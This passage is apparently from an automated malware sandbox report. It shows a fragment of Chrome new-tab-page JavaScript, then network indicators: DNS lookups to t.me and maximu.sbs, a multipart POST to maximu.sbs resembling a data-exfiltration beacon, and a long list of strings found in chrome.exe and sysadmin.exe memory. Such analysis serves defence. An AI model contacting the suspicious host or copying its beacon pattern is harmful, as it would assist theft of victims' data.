url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
            Source: global trafficDNS traffic detected: DNS query: t.me
            Source: global trafficDNS traffic detected: DNS query: maximu.sbs
            Source: global trafficDNS traffic detected: DNS query: www.google.com
            Source: global trafficDNS traffic detected: DNS query: apis.google.com
            Source: global trafficDNS traffic detected: DNS query: play.google.com
            Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----x4ozm7y5p8q1nycbaimgUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0Host: maximu.sbsContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8215
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8229
            Source: chrome.exe, 00000005.00000003.1850911599.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1847717169.00006A400036C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8280
            Source: chrome.exe, 00000005.00000003.1850937604.00006A40007C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issuetracker.google.com/200067929
            Source: sysadmin.exeString found in binary or memory: http://james.newtonking.com/projects/json
            Source: chrome.exe, 00000005.00000003.1856921212.00006A4000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856659366.00006A4000EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1857052776.00006A400100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856779226.00006A4000FE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsbin.com/temexa/4.
            Source: chrome.exe, 00000005.00000003.1856921212.00006A4000F08000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859814307.00006A4001150000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856815221.00006A4001040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858821366.00006A4000F64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858508013.00006A4000EE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1858570195.00006A40007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856659366.00006A4000EEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859506476.00006A40010E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859095154.00006A40003A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1857052776.00006A400100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1856779226.00006A4000FE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000005.00000003.1859371665.00006A4000E0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://polymer.github.io/AUTHORS.txt
